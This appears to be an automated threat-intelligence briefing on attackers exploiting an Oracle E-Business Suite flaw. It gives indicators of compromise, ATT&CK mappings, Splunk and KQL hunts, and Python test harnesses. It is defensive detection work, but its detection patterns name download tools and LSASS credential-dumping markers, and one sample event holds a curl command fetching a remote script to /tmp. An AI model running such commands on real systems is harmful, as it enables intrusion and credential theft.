# [HIGH] Hackers now exploit critical Oracle E-Business flaw in attacks

**Source:** BleepingComputer
**Published:** 2026-06-29
**Article:** https://www.bleepingcomputer.com/news/security/new-oracle-e-business-suite-flaw-now-exploited-in-attacks/

## Threat Profile

By Sergiu Gatlan, June 29, 2026, 09:46 AM

Attackers have begun exploiting a critical vulnerability (tracked as CVE-2026-46817) in the Oracle E-Business Suite (EBS) financial application, according to threat intelligence company Defused.

This security flaw was found in the File Transmission component of EBS's Oracle Payments product and enables unauthenticated malicious actors with HTTP network access to take over vulnerab…

## Indicators of Compromise (high-fidelity only)

- **CVE:** `CVE-2026-46817`
- **CVE:** `CVE-2025-61882`
- **CVE:** `CVE-2025-61884`
- **CVE:** `CVE-2024-21182`
- **CVE:** `CVE-2026-35273`
- **IPv4 (defanged):** `200.107.207[.]26`
- **IPv4 (defanged):** `161.97.99[.]49`
- **IPv4 (defanged):** `162.55.17[.]215`
- **IPv4 (defanged):** `104.194.11[.]200`
- **Domain (defanged):** `pubstorm[.]com`
- **Domain (defanged):** `pubstorm[.]net`

## MITRE ATT&CK Techniques

- **T1190** — Exploit Public-Facing Application
- **T1486** — Data Encrypted for Impact
- **T1003.001** — LSASS Memory
- **T1003** — OS Credential Dumping
- **T1021.002** — SMB/Windows Admin Shares
- **T1569.002** — Service Execution
- **T1071** — Application Layer Protocol
- **T1505.003** — Server Software Component: Web Shell
- **T1059.004** — Command and Scripting Interpreter: Unix Shell
- **T1071.004** — Application Layer Protocol: DNS
- **T1567** — Exfiltration Over Web Service
- **T1657** — Financial Theft

## Kill chain phases observed

_(none detected from narrative keywords)_

## Recommended hunts

### Oracle E-Business Suite web tier (java/httpd) spawning a shell — CVE-2026-46817 post-exploit RCE

`UC_4_5` · phase: **exploit** · confidence: **Medium** · AI-generated for this article

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime
    from datamodel=Endpoint.Processes
    where Processes.parent_process_name IN ("java","java.exe","httpd","httpd.exe","apache2","beasvc.exe","weblogic.exe")
      AND Processes.process_name IN ("sh","bash","dash","ksh","python","python3","perl","cmd.exe","powershell.exe","pwsh","curl","wget","whoami","id","uname")
    by Processes.dest, Processes.user, Processes.parent_process_name, Processes.process_name, Processes.process, Processes.parent_process
| `drop_dm_object_name(Processes)`
| convert ctime(firstTime) ctime(lastTime)
```

**Defender KQL:**
```kql
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ("java","java.exe","httpd","httpd.exe","apache2","beasvc.exe","weblogic.exe")
| where FileName in~ ("sh","bash","dash","ksh","python","python3","perl","cmd.exe","powershell.exe","pwsh","curl","wget","whoami","id","uname")
| where AccountName !endswith "$"
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, FolderPath, SHA256
| order by Timestamp desc
```
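The same parent/child rule as the SPL and KQL above, expressed in Python so it can be run over sample events and tuned before it goes into the SIEM. This is an added example, not code from the article or from Defused; the field names follow the Endpoint.Processes data model, the hosts, users and paths in the sample events are constructed, and the `allowlist` of benign child command-line markers is a hypothetical tuning knob. On an EBS application tier `java` spawning `sh` is not rare, so the example ranks children that reach out or enumerate the host (`curl`, `wget`, `id`, `whoami`, `uname`) ahead of plain shells.

```python
"""Added example, not code from the article or from Defused: the UC_4_5
parent/child rule above, run over constructed process-creation events so it
can be tested before deployment. Field names follow the Endpoint.Processes
data model the SPL uses; the sample paths, hosts and users are invented."""
import os
from collections import Counter
from dataclasses import dataclass

WEB_TIER_PARENTS = {"java", "java.exe", "httpd", "httpd.exe", "apache2",
                    "beasvc.exe", "weblogic.exe"}
SHELL_CHILDREN = {"sh", "bash", "dash", "ksh", "python", "python3", "perl",
                  "cmd.exe", "powershell.exe", "pwsh", "curl", "wget",
                  "whoami", "id", "uname"}
# Children that talk out or enumerate the host deserve the first look.
HIGH_PRIORITY = {"curl", "wget", "whoami", "id", "uname"}


@dataclass(frozen=True)
class ProcessEvent:
    dest: str                 # host
    user: str
    parent_process_name: str
    parent_process: str       # full parent command line
    process_name: str
    process: str              # full child command line


def basename(name: str) -> str:
    """Normalise 'C:\\Windows\\System32\\cmd.exe' or '/usr/bin/sh' to 'cmd.exe' / 'sh'."""
    return os.path.basename(name.strip('"').replace("\\", "/")).lower()


def is_suspicious_spawn(ev: ProcessEvent, allowlist=()) -> bool:
    """True when a web-tier parent launches a shell/interpreter/recon binary.
    `allowlist` holds substrings of *child* command lines known to be benign
    on the local EBS tier (hypothetical; tuning is site-specific)."""
    if basename(ev.parent_process_name) not in WEB_TIER_PARENTS:
        return False
    if basename(ev.process_name) not in SHELL_CHILDREN:
        return False
    return not any(marker in ev.process for marker in allowlist)


def hunt(events, allowlist=()):
    """Mirror the tstats `by dest user parent_process_name process_name` grouping.
    Returns (hits, counts): hits ordered with high-priority children first,
    counts mapping the grouping tuple to the number of matching events."""
    hits = [e for e in events if is_suspicious_spawn(e, allowlist)]
    hits.sort(key=lambda e: basename(e.process_name) not in HIGH_PRIORITY)
    counts = Counter(
        (e.dest, e.user, basename(e.parent_process_name), basename(e.process_name))
        for e in hits
    )
    return hits, dict(counts)


# Constructed sample telemetry (not from the article); /u01/EBSapps is an assumed path.
SAMPLE_EVENTS = [
    ProcessEvent("ebsapp01", "applmgr", "/usr/java/bin/java",
                 "java -Dweblogic.Name=oacore_server1 weblogic.Server",
                 "/bin/sh", "sh -c 'id; uname -a'"),
    ProcessEvent("ebsapp01", "applmgr", "/usr/java/bin/java",
                 "java -Dweblogic.Name=oacore_server1 weblogic.Server",
                 "/usr/bin/curl", "curl -s http://203.0.113.9/a.sh -o /tmp/a.sh"),
    ProcessEvent("ebsapp01", "applmgr", "/usr/java/bin/java",
                 "java -Dweblogic.Name=oacore_server1 weblogic.Server",
                 "/bin/sh", "sh /u01/EBSapps/appl/admin/scripts/rotate_logs.sh"),
    ProcessEvent("ebsapp01", "root", "/usr/sbin/sshd", "sshd: root [priv]",
                 "/bin/bash", "-bash"),
    ProcessEvent("ebsweb01", "applmgr", "/usr/sbin/httpd", "httpd -k start",
                 "/usr/sbin/httpd", "httpd -k start"),
]

if __name__ == "__main__":
    hits, counts = hunt(SAMPLE_EVENTS, allowlist=("/u01/EBSapps/",))
    for e in hits:
        print(f"{e.dest} {e.user} {basename(e.parent_process_name)} -> {e.process}")
    print(counts)
```

Without the allowlist the third event (a scripted log rotation under an assumed EBS path) fires too; the point of the allowlist is to encode that baseline explicitly rather than raising the rule's threshold and losing the `curl` and `id; uname -a` hits with it.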

### Host communicating with Clop EBS extortion infrastructure (pubstorm[.]com / pubstorm[.]net)

`UC_4_6` · phase: **actions** · confidence: **High** · AI-generated for this article

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime
    from datamodel=Network_Resolution.DNS
    where DNS.query="pubstorm.com" OR DNS.query="*.pubstorm.com"
       OR DNS.query="pubstorm.net" OR DNS.query="*.pubstorm.net"
    by DNS.src, DNS.query, DNS.dest
| `drop_dm_object_name(DNS)`
| convert ctime(firstTime) ctime(lastTime)
```

**Defender KQL:**
```kql
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any ("pubstorm.com","pubstorm.net")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort
| order by Timestamp desc
```

### Inbound CL0P extortion email from pubstorm.com / pubstorm.net

`UC_4_7` · phase: **actions** · confidence: **High** · AI-generated for this article

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime
    from datamodel=Email.All_Email
    where All_Email.src_user="*@pubstorm.com" OR All_Email.src_user="*@pubstorm.net"
    by All_Email.src_user, All_Email.recipient, All_Email.subject
| `drop_dm_object_name(All_Email)`
| convert ctime(firstTime) ctime(lastTime)
```

**Defender KQL:**
```kql
EmailEvents
| where Timestamp > ago(30d)
| where SenderFromDomain in~ ("pubstorm.com","pubstorm.net") or SenderMailFromDomain in~ ("pubstorm.com","pubstorm.net")
| project Timestamp, SenderFromAddress, SenderMailFromAddress, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, NetworkMessageId
| order by Timestamp desc
```

### Internet-facing Oracle E-Business Suite hosts vulnerable to CVE-2026-46817

`UC_4_8` · phase: **exploit** · confidence: **High** · AI-generated for this article

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count
    from datamodel=Vulnerabilities.Vulnerabilities
    where Vulnerabilities.signature="CVE-2026-46817" OR Vulnerabilities.cve="CVE-2026-46817"
    by Vulnerabilities.dest, Vulnerabilities.signature, Vulnerabilities.severity
| `drop_dm_object_name(Vulnerabilities)`
```

**Defender KQL:**
```kql
DeviceTvmSoftwareVulnerabilities
| where CveId == "CVE-2026-46817"
| join kind=leftouter (DeviceInfo | where Timestamp > ago(7d) | summarize arg_max(Timestamp, IsInternetFacing, PublicIP) by DeviceId) on DeviceId
| project DeviceName, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel, RecommendedSecurityUpdate, IsInternetFacing, PublicIP
| order by IsInternetFacing desc
```

### Ransomware-style mass file rename / extension change

`UC_RANSOM_ENCRYPT` · phase: **actions** · confidence: **Medium**

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count, dc(Filesystem.file_name) AS files
    from datamodel=Endpoint.Filesystem
    where Filesystem.action IN ("modified","renamed")
    by Filesystem.dest, Filesystem.user, _time span=1m
| `drop_dm_object_name(Filesystem)`
| where files > 200
| sort - files
```

**Defender KQL:**
```kql
DeviceFileEvents
| where Timestamp > ago(1d)
| where InitiatingProcessAccountName !endswith "$"
| where ActionType in ("FileRenamed","FileModified")
| summarize files = dcount(FileName) by DeviceName, InitiatingProcessAccountName, bin(Timestamp, 1m)
| where files > 200    // 200 is a starting threshold, not a validated number; baseline it
                       // against your own backup, sync and build jobs before alerting on it
| order by files desc
```
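The same one-minute bucket heuristic, implemented in Python over constructed file events so the threshold can be exercised offline. This is an added example and not code from the article; column names follow the DeviceFileEvents table the KQL queries, the hosts, accounts and file names are invented, and it goes one step beyond the queries by also reporting the share of renamed files that end in the single most common new extension, which sits near 1.0 for an encryptor and much lower for ordinary bulk tooling.

```python
"""Added example, not the article's code: the UC_RANSOM_ENCRYPT heuristic above
(distinct files renamed/modified per host and account per one-minute bucket,
machine accounts excluded), applied to constructed file events, plus one
refinement the queries do not make: the share of files carrying the single
most common extension inside the bucket."""
import os
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

THRESHOLD = 200       # the page's starting threshold; baseline locally
BUCKET_SECONDS = 60   # bin(Timestamp, 1m) / span=1m


def bucket_start(ts: datetime) -> int:
    """Epoch second of the one-minute bin containing ts."""
    return int(ts.timestamp()) // BUCKET_SECONDS * BUCKET_SECONDS


def burst_renames(events, threshold=THRESHOLD):
    """events: dicts with Timestamp, DeviceName, InitiatingProcessAccountName,
    ActionType, FileName (the DeviceFileEvents columns the KQL uses).
    Returns rows (device, account, bucket_epoch, distinct_files, top_ext_share)
    for every bucket whose distinct-file count exceeds threshold, largest first."""
    files = defaultdict(set)
    for e in events:
        if e["InitiatingProcessAccountName"].endswith("$"):
            continue  # machine accounts, as in the KQL
        if e["ActionType"] not in ("FileRenamed", "FileModified"):
            continue
        key = (e["DeviceName"], e["InitiatingProcessAccountName"], bucket_start(e["Timestamp"]))
        files[key].add(e["FileName"].lower())
    rows = []
    for key, names in files.items():
        if len(names) <= threshold:
            continue
        exts = Counter(os.path.splitext(n)[1] for n in names)
        share = exts.most_common(1)[0][1] / len(names)
        rows.append((*key, len(names), round(share, 2)))
    rows.sort(key=lambda r: -r[3])
    return rows


def make_sample_events():
    """Constructed telemetry for this example; hosts, accounts and names are invented."""
    base = datetime(2026, 6, 29, 9, 46, 0, tzinfo=timezone.utc)
    ev = []
    # 250 finance documents renamed to one new extension by one account within 30 s
    for i in range(250):
        ev.append({"Timestamp": base + timedelta(milliseconds=i * 120),
                   "DeviceName": "FS01", "InitiatingProcessAccountName": "svc_ebs",
                   "ActionType": "FileRenamed", "FileName": f"invoice_{i}.xlsx.lockd"})
    # 300 modifications by a backup agent running as the machine account (excluded)
    for i in range(300):
        ev.append({"Timestamp": base + timedelta(milliseconds=i * 100),
                   "DeviceName": "FS01", "InitiatingProcessAccountName": "FS01$",
                   "ActionType": "FileModified", "FileName": f"backup_{i}.vhdx"})
    # 50 edits by a user spread over ten minutes: five per bucket, far below threshold
    for i in range(50):
        ev.append({"Timestamp": base + timedelta(seconds=i * 12),
                   "DeviceName": "WS07", "InitiatingProcessAccountName": "j.doe",
                   "ActionType": "FileModified", "FileName": f"draft_{i}.docx"})
    return ev


if __name__ == "__main__":
    for row in burst_renames(make_sample_events()):
        print(row)
```

The extension share is what separates this from a backup or sync job that also touches hundreds of files a minute: those leave the original extensions in place, so the top-extension share stays spread across `.docx`, `.xlsx`, `.pdf` and so on rather than collapsing onto one value.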

### LSASS process access / dump (credential theft)

`UC_LSASS` · phase: **actions** · confidence: **High**

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime
    from datamodel=Endpoint.Processes
    where Processes.process="*sekurlsa*"
       OR Processes.process="*MiniDump*"
       OR Processes.process="*procdump*lsass*"
       OR Processes.process="*lsass*"
    by Processes.dest, Processes.user, Processes.process_name, Processes.process, Processes.parent_process_name
| `drop_dm_object_name(Processes)`
```

The `*comsvcs.dll*MiniDump*` and `rundll32.exe ... *comsvcs*MiniDump*` clauses of the earlier form are already covered by `*MiniDump*`. The bare `*lsass*` clause also matches routine administration (`tasklist`, `Get-Process lsass` and similar troubleshooting), so treat hits that satisfy only that clause as a triage feed; `sekurlsa`, `MiniDump` and `procdump ... lsass` are the high-confidence signal.

**Defender KQL:**
```kql
DeviceEvents
| where Timestamp > ago(7d)
| where AccountName !endswith "$"
| where ActionType == "OpenProcessApiCall"
| where FileName =~ "lsass.exe"
| where InitiatingProcessFileName !in~ ("MsSense.exe","MsMpEng.exe","csrss.exe",
                                          "svchost.exe","wininit.exe","services.exe",
                                          "lsm.exe","SearchProtocolHost.exe")
| project Timestamp, DeviceName, ActionType, FileName,
          InitiatingProcessFileName, InitiatingProcessCommandLine,
          InitiatingProcessFolderPath, AccountName
| order by Timestamp desc
```

The exclusion list above is keyed on file name alone, so a dumper copied to `svchost.exe` slips through it; before trusting an excluded hit, confirm `InitiatingProcessFolderPath` is the expected system or Defender platform directory for that name.

### Remote service execution — PsExec / SMB lateral movement

`UC_LATERAL_PSEXEC` · phase: **actions** · confidence: **High**

**Splunk SPL (CIM):**
```spl
| tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime
    from datamodel=Endpoint.Processes
    where Processes.process_name IN ("psexec.exe","psexesvc.exe","paexec.exe","smbexec.py")
       OR (Processes.process_name="wmic.exe" AND Processes.process="*/node:*")
    by Processes.dest, Processes.user, Processes.process_name, Processes.process, Processes.parent_process_name
| `drop_dm_object_name(Processes)`
```

**Defender KQL:**
```kql
DeviceProcessEvents
| where Timestamp > ago(7d)
| where AccountName !endswith "$"
| where FileName in~ ("psexec.exe","psexesvc.exe","paexec.exe","smbexec.py")
   or (FileName =~ "wmic.exe" and ProcessCommandLine has "/node:")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
```

### IOC-driven hunts (use shared templates)

These are standard IOC-substitution hunts — the canonical SPL and KQL live once in [`_TEMPLATES.md`](../_TEMPLATES.md), so we don't repeat the same boilerplate on every CVE / hash / network-IOC briefing.

- **Asset exposure — vulnerability matches article CVE(s)** ([template](../_TEMPLATES.md#asset-exposure)) — phase: **recon**, confidence: **High**
  - CVE(s): `CVE-2026-46817`, `CVE-2025-61882`, `CVE-2025-61884`, `CVE-2024-21182`, `CVE-2026-35273`

- **Network connections to article IPs / domains** ([template](../_TEMPLATES.md#network-ioc)) — phase: **c2**, confidence: **High**
  - IP / domain IOC(s): `200.107.207.26`, `161.97.99.49`, `162.55.17.215`, `104.194.11.200`, `pubstorm.com`, `pubstorm.net`
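The IOCs above are listed in defanged form while the hunts need live values, and a domain IOC should match its subdomains without matching look-alikes such as `notpubstorm.com`. This added example (not code from the article, Defused or the shared templates) normalises both forms, matches DNS queries by domain suffix and connections by exact IP, and runs over a handful of constructed log lines; the IOC values are the ones this page lists, everything else is invented.

```python
"""Added example, not from the article: normalise the defanged IOCs listed in
this briefing into matchable form and check DNS queries and destination IPs
against them, domains matched by suffix (subdomains count) and IPs exactly.
The log lines are constructed; the IOC values are the ones the page lists."""
import ipaddress
import re

IOCS = ["200.107.207[.]26", "161.97.99[.]49", "162.55.17[.]215",
        "104.194.11[.]200", "pubstorm[.]com", "pubstorm[.]net"]

_REFANG = (("[.]", "."), ("(.)", "."), ("[:]", ":"), ("hxxp", "http"), ("hXXp", "http"))


def refang(value: str) -> str:
    """Turn a defanged indicator into its live, lower-cased form (trailing dot dropped)."""
    for defanged, live in _REFANG:
        value = value.replace(defanged, live)
    return value.strip().lower().rstrip(".")


def defang(value: str) -> str:
    """Make an indicator safe to paste into a report or ticket."""
    return value.replace("http", "hxxp").replace(".", "[.]")


class IocSet:
    def __init__(self, iocs):
        self.ips, self.domains = set(), set()
        for raw in iocs:
            v = refang(raw)
            try:
                self.ips.add(str(ipaddress.ip_address(v)))
            except ValueError:
                self.domains.add(v)

    def match_ip(self, ip: str) -> bool:
        try:
            return str(ipaddress.ip_address(ip.strip())) in self.ips
        except ValueError:
            return False   # malformed address: never a match

    def match_domain(self, name: str) -> bool:
        n = refang(name)
        # exact match or a true subdomain; "notpubstorm.com" does not qualify
        return any(n == d or n.endswith("." + d) for d in self.domains)


# Constructed log lines: "<ts> dns <src> <query>" and "<ts> conn <src> <dst>:<port>"
SAMPLE_LOG = """\
2026-06-29T09:50:01Z dns 10.0.5.12 mail.pubstorm.com
2026-06-29T09:50:02Z dns 10.0.5.12 notpubstorm.com
2026-06-29T09:50:03Z dns 10.0.5.40 pubstorm.net.
2026-06-29T09:51:10Z conn 10.0.5.12 200.107.207.26:443
2026-06-29T09:51:11Z conn 10.0.5.12 200.107.207.260:443
2026-06-29T09:51:12Z conn 10.0.5.40 10.0.0.1:53
"""

_LINE = re.compile(r"^(\S+) (dns|conn) (\S+) (\S+)$")


def scan(log_text: str, iocs=IOCS):
    """Return (ts, src, defanged indicator) for every line that touches an IOC."""
    ioc = IocSet(iocs)
    hits = []
    for line in log_text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        ts, kind, src, target = m.groups()
        if kind == "dns" and ioc.match_domain(target):
            hits.append((ts, src, defang(refang(target))))
        elif kind == "conn":
            dst = target.rsplit(":", 1)[0]
            if ioc.match_ip(dst):
                hits.append((ts, src, defang(dst)))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

Keep the refanged values for the queries and the defanged ones for anything a human reads; the class keeps IPs and domains in separate sets so an IP is never suffix-matched and a domain is never parsed as an address.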


## Why this matters

Severity classified as **HIGH** based on: CVE present, IOCs present, 9 use case(s) fired, 12 technique(s) inferred. Read the full article for actor attribution, tooling details, and any defanged IOCs in the body that aren't visible in the RSS summary.
